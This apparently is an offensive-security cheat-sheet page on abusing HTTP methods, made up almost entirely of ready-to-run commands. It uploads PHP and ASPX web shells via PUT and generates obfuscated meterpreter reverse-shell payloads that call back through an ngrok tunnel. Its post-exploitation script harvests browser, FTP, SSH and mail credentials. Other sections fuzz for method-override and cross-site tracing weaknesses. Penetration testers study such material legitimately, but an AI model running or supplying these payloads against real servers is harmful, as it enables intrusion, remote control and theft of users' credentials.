HTTP Methods

Check List

Cheat Sheet

Discover the Supported Methods

cURL

Check Methods

curl -X OPTIONS -I $WEBSITE

Upload phpinfo()

curl -X PUT -d "<?php phpinfo(); ?>" $WEBSITE/phpinfo.php

Nmap

nmap -sS -sV --mtu 5000 --script http-methods $WEBSITE

PUT Method

Weevely

Create Web Shell PHP

weevely generate 00980098 /tmp/unk9vvn.php

Create Web Shell ASPX

cp /usr/share/webshells/aspx/cmdasp.aspx /tmp/unk9vvn.aspx

cURL

Upload Web Shell PHP

curl -X PUT $WEBSITE/uploads/index.php \
--upload-file /tmp/unk9vvn.php \
-H "Content-Type: application/x-php"

Execute Web Shell PHP

weevely "$WEBSITE/uploads/index.php" 00980098

Upload Web Shell ASP

curl -X PUT $WEBSITE/uploads/index.aspx \
--upload-file /tmp/unk9vvn.aspx \
-H "Content-Type: application/x-aspx"

Execute Web Shell ASP

curl "$WEBSITE/uploads/index.aspx?cmd=whoami"

Metasploit

All Methods Scan

msfconsole -qx "use auxiliary/scanner/http/options;set RHOSTS $WEBSITE;set RPORT 443;set SSL true;run -j"

PUT Method Scan

msfconsole -qx "use auxiliary/scanner/http/http_put;set RHOSTS $WEBSITE;set RPORT 443;set SSL true;set PATH /uploads;run -j"

Start Ngrok

nohup ngrok tcp 4444 >/dev/null 2>&1 &

Define ENV Ngrok

NGINFO=$(curl --silent --show-error http://127.0.0.1:4040/api/tunnels); \
NGHOST=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/([^"]*):.*/\1/p'); \
NGPORT=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/.*.tcp.*.ngrok.io:([^"]*).*/\1/p')

Cert Spoof

rm -rf /home/$USER/.msf4/loot/*;msfconsole -qx "use auxiliary/gather/impersonate_ssl;set RHOSTS google.com;run;exit"

Post-EXP

cat > /tmp/post-exp.rc << EOF
getprivs
getsystem
run multi/gather/firefox_creds DECRYPT=true
run multi/gather/filezilla_client_cred
run multi/gather/ssh_creds
run multi/gather/thunderbird_creds
run multi/gather/wlan_geolocate
bg
EOF

Generate Web shell PHP

msfvenom -p php/meterpreter/reverse_tcp LHOST=$NGHOST PORT=$NGPORT EnableStageEncoding=true -f raw -e php/base64 -i 3 -o /tmp/unk9vvn.php;sed -i "s#eval#<?php eval#g" /tmp/unk9vvn.php;sed -i "s#));#)); ?>#g" /tmp/unk9vvn.php

Generate Web Shell ASP

msfvenom -p windows/meterpreter/reverse_winhttps LHOST=$NGHOST PORT=$NGPORT EnableStageEncoding=true -f asp > /tmp/unk9vvn.aspx

Listening Metasploit PHP

msfconsole -qx "use multi/handler;set PAYLOAD php/meterpreter/reverse_tcp;set LHOST $NGHOST;set LPORT $NGPORT;set ReverseListenerBindAddress 127.0.0.1;set ReverseListenerBindPort 4444;set StageEncoder true;set AutoRunScript /tmp/post-exp.rc;run -j"

Listening Metaploit ASP

msfconsole -qx "use multi/handler;set PAYLOAD windows/meterpreter/reverse_winhttps;set LHOST $NGHOST;set LPORT $NGPORT;set ReverseListenerBindAddress 127.0.0.1;set ReverseListenerBindPort 4444;set StageEncoder true;set AutoRunScript /tmp/post-exp.rc;run -j"

Upload Shell PUT Method PHP

curl -X PUT $WEBSITE/wp-content/uploads/index.php \
--upload-file /tmp/unk9vvn.php \
-H "Content-Type: application/x-php"

Access Control Bypass

Katana

Extract URLs

katana -u $WEBSITE \
  -fr "(static|assets|img|images|css|fonts|icons)/" \
  -o /tmp/katana_output.txt \
  -xhr-extraction \
  -automatic-form-fill \
  -silent \
  -strategy breadth-first \
  -js-crawl \
  -extension-filter jpg,jpeg,png,gif,bmp,tiff,tif,webp,svg,ico,css \
  -headless --no-sandbox \
  -known-files all \
  -field url \
  -sf url

cat /tmp/katana_output.txt | \
sed 's/\?.*//' | \
sed 's/\.aspx$//' | \
sed 's/\/[^/]*\.json$//' | \
grep -v '\.js$' | \
grep -v '&amp' | \
sort -u > /tmp/urls.txt

FFUF

HTTP Method Fuzz

echo -e "GET\nPOST\nPUT\nDELETE\nHEAD\nOPTIONS\nTRACE\nCONNECT\nPATCH" > /tmp/methods.txt; \
ffuf -w /tmp/methods.txt:METHODS \
     -w /tmp/urls.txt:URL \
     -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:DIR \
     -u URL/DIR \
     -X METHODS \
     -r -c -mc 200

Cross-Site Tracing Potential

FFUF

ffuf -w /tmp/urls.txt:URL \
     -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:DIR \
     -u URL/DIR \
     -X TRACE \
     -H "Custom-Test-Header: <scipt>alert('unk9vvn')</script>" \
     -r -c -mc 200 -mr "unk9vvn"

HTTP Method Overriding

FFUF

X-HTTP-Method

echo -e "GET\nPOST\nPUT\nDELETE\nHEAD\nOPTIONS\nTRACE\nCONNECT\nPATCH" > /tmp/methods.txt; \
ffuf -w /tmp/methods.txt:METHODS \
     -w /tmp/urls.txt:URL \
     -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:DIR \
     -u URL/DIR \
     -X METHODS \
     -H "X-HTTP-Method: METHODS" \
     -r -c -mc 200

X-HTTP-Method-Override

echo -e "GET\nPOST\nPUT\nDELETE\nHEAD\nOPTIONS\nTRACE\nCONNECT\nPATCH" > /tmp/methods.txt; \
ffuf -w /tmp/methods.txt:METHODS \
     -w /tmp/urls.txt:URL \
     -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:DIR \
     -u URL/DIR \
     -X METHODS \
     -H "X-HTTP-Method-Override: METHODS" \
     -r -c -mc 200

X-Method-Override

echo -e "GET\nPOST\nPUT\nDELETE\nHEAD\nOPTIONS\nTRACE\nCONNECT\nPATCH" > /tmp/methods.txt; \
ffuf -w /tmp/methods.txt:METHODS \
     -w /tmp/urls.txt:URL \
     -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:DIR \
     -u URL/DIR \
     -X METHODS \
     -H "X-Method-Override: METHODS" \
     -r -c -mc 200
PreviousEnumerate Admin InterfacesNextHTTP Strict Transport Security

Last updated

Was this helpful?